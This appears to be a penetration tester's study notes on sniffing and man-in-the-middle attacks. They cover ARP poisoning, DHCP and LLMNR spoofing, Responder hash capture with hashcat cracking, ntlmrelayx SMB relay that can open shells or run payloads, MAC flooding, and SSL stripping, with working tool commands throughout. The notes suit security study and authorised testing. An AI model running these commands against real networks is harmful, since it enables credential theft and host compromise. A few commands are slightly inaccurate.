Sniffing & MitM

Introduction

Sniffing can be used defensively, as well as offensively:

Defensive: Snort / Zeek / Suricata - Detect suspicious packet patterns / content
Offensive: Look for sensitive information like password / session token / ...

There are two types of sniffing - Passive & Active:

Passive: Typical example: Wireshark / Zeek / ...
Active: MAC flooding / ARP poisoning

Therefore to defense, we have to ensure that data in motion should be encrypted!

Man-in-the-Middle is the attacker whose interface sitting between two parties, and acts as proxy to read, insert and modify the data in the intercepted communication.

In a switch environment, the switch can be configured with mirror port to mirror some traffic to a destination. The host connecting to the mirror port can be configured with promiscuous mode to sniff the mirrored traffic.

Sniffing

MAC flooding: Intentionally flood a switch CAM table, leading to eliminating the switch's ability to learn new MAC addresses. As a result, all traffic will be then forwarded to the attacker.
ARP poisoning: Most used technique in MitM attack. ARP poisoning redirects the traffic of the selected victims to a specific machine.

ARP

ARP = Translate between IP Address (L3) and MAC address (L2)

Every host has an ARP table to store IP-MAC pairs and their TTL. To view the ARP table:

# Windows
arp -a

# Linux
arp

In real life sceanario, when A wants to send data to B, but A does not know B's MAC address, A will perform a ARP broadcast (destination MAC address = FF:FF:FF:FF:FF:FF). Then B will send back an ARP reply with its MAC address.

Gratuitous ARP Request & Response

Gratuitous ARP request is a request packer with identical source and destination IP address, while setting the destination MAC address to be broadcast (FF:FF:FF:FF:FF:FF). While Gratuitous ARP reply is an ARP reply that has been sent without being requested. These are made to detect IP conflict.

Host Poisoning

Attack forges Gratuitous ARP replies (with fake IP to MAC correspondence) to both the communication peers, making the traffic from B to A and from A to B will pass through the attacker.

Gateway Poisoning

Attacker forges Gratuitous ARP replies (with fake IP to MAC correspondence) to some / all the hosts in a network, announcing his MAC address as the MAC address of the default gateway.

Sniffing Tools

Dsniff

dsniff

Out of support
Monitor network for data such as passwords, emails, files, ...

dsniff <options>

-c: Half-duplex TCP stream reassembly (handle asymmetric routed traffic)
-d: Debug
-m: Enable automatic protocol detection
-n: Do not resolve IP addresses to hostnames
-p: Process the content of a PCAP
-i: Listening Interface

Wireshark

---

Tcpdump

Syntax:

tcpdump [options] [filter expression]

To see all traffic:

sudo tcpdump -i <interface>

sudo tcpdump -i <interface> -nxxAXXSs 0 dst 192.168.1.1

-A:  Print ASCII
-XX: Print the headers + data + link-level header in HEX and ASCII
-xx: Print the headers + data + link-level header in HEX
-S:  Print absolute, rather than relative TCP seq numbers
-s 0:  Get whole packet
-n:  No resolve
-v, -vv, -vvv:  Verbosity

Windump

Windows version Tcpdump.

Man-in-the-Middle Attacks

ARP Poisoning

Flood the victim with Gratuitous ARP, replacing the MAC address of the default gateway to be the attacker's MAC address in the victim's ARP table

DHCP Spoofing

DHCP clients choose the best offer according to the lease time attribute - the longer the better
A rogue DHCP server simply sends DHCPOFFER with a greater lease time and Rouge MAC address.
Also DHCP also determines the default gateway of the client!

LLMNR (Link-local Multicast Name Resolution)

Concept

LLMNR and NBT-NS spoofing are 2 very effective methods for capturing users' NTLMv1 / NTLMv2 / LM hashes.
They allow machines within a Windows network to find each other, and are essentially a fallback protocol for the resolution of hostnames within a network when DNS cannot resolve the IP.
When LLMNR / NBT-NS broadcasts for host discovery, there is a chance that NTLMv1/v2 hashes being sent over the network.
- Example: \\<somehost>\ The host does not know somehost and go on broadcast LLMNR / NBT-NS message The somehost turns out to be the attacker and responds to this broadcast A sign-in prompt appears in the victim machine, and when entered, the username and NTLM hashes will be sent to the attacker.

Conditions

(LLMNR) Multicast Name Resolution has not been turned off in Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client
(NBT-NS) NetBIOS over TCP/IP is not disabled in Network Connections / Network Adapter Properties / TCP/IPv4 Properties > Advanced Tab > WINS tab

Responder

Responder is a tool which perform LLMNR poisoning
Typically when in red team / pen testing situation, this tool is run in the morning. Since it is common that LLMNR is not disable, there will be at least some hashes we can collect.
Steps:

[1] Run Responder in the target network

python Responder.py -l <interface> -rdw

[2] An event occurs (e.g. someone typed in a wrong network drive)

[3] Get Dem Hashes and save as hashes.txt

[4] Offline crack the Dem Hashes

hashcat -m 5600 hashes.txt rockyou.txt

[5] Alternatively, instead of cracking, we can relay the hashes to specific machines (SMB signing should be disabled on the targets)

SMB Relay Attack

Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access.

The requirements are:

SMB signing must be disabled on the target
Relayed user credentials must be admin on the targets
Network Discovery is turned on in the targets

To verify if the target has SMB signing disabled, we can use RunFinger.py in the Responder package:

python RunFinger.py -i <target>

The steps on launching the attack:

[1] Run Responder with configurations (/etc/responder/Responder.conf):

SMB = Off
HTTP = Off

[2] Run Responder.py

python Responder.py -I tun0 -rdwv

[3] Run ntlmrelayx.py:

python ntlmrelayx.py -tf <targets.txt> -smb2support

[4] A LLMNR / NBT-NS event occurs (e.g. wrong network drive)

[5] ntlmrelayx.py authenticates against the victim machines, getting the hashes in the local SAM database

We can also configure ntlmrelayx.py to give us interactive shell:

ntlmrelayx.py -tf <targets.txt> -smb2support -i

If authenticated successfully, the sessions will be shown on the console. We can then use nc to connect.

To run an executable (e.g. msfvenom generated payload) upon connection, use the -f flag:

ntlmrelayx.py -tf <targets.txt> -smb2support -f <executable>

MitM Tools

Ettercap

Sniff POP/HTPPS/HTTPS/SFTP with password cracking feature

sudo ettercap -G

-G stands for graphical interface

Cain & Abel

GUI ...

Macof

Perform MAC flooding on switch, attempt to cause fail-open state - Switch acts as Hub.

sudo macof -i <interface>

After running this, we can use Wireshark / dsniff / tcpdump to capture traffic from the switch.

Arpspoof

Before doing, make sure you have IP forwarding enabled on the attack machine:

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

You have to execute both of the following:

sudo arpspoof -i <interface> -t <victim> <gateway>
sudo arpspoof -i <interface> -t <gateway> <victim>

After running this, we can use Wireshark / dsniff / tcpdump to capture traffic between these 2 hosts.

SSL Traffic

To intercept SSL traffic, we can use Ettercap and configure it to use SSL certificate. Edit /etc/ettercap/etter.conf:

[privs]
ec_uid = 0
ec_gid = 0

Also uncomment the following:

redir_command_on
redir_command_off

However, each time the user browses a HTTPS page, certificate error will show.

SSL Tools

Sslstrip (Very old technique ... Not work!)

GitHub - moxie0/sslstrip: A tool for exploiting Moxie Marlinspike's SSL "stripping" attack.GitHub

[1] Enable IP forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

[2] Set port redirection using iptables

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

[3] Start Sslstrip

sslstrip -a -f -l 8080 -w sslstrip.log

Note that this does not work anymore (likely) since browsers have implemented HSTS!

Bypass HSTS

GitHub - byt3bl33d3r/MITMf: Framework for Man-In-The-Middle attacksGitHub

Requirements:

Use sslstrip+
Run a DNS server to intercept and edit the victim's DNS requests

High-level:

The victim goes to google.com (not in the HSTS preload list)
Attacker intercepts the traffic and change the links in the web page. (e.g. a.google.com --> aaa.google.com)
The victim makes a DNS request for aaa.google.com
Attacker intercepts the request, forward the real DNS request and respond to the victim with a fake domain and the IP address

python mitf.py -i <interface> --spoof --arp --dns --hsts --gateway <gateway_ip> --targets <target_ip>

PreviousSearchSploit NextCommon Protocols

Last updated 4 years ago